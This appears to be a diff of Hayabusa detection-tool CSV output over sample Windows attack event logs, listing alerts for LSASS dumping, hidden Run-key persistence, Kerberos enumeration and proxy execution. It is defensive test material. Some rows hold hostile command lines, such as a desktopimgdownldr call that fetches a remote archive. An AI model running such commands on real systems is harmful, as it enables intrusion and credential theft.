+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,../hayabusa-rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx
+2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx
+2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx
+2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
+2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
+2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
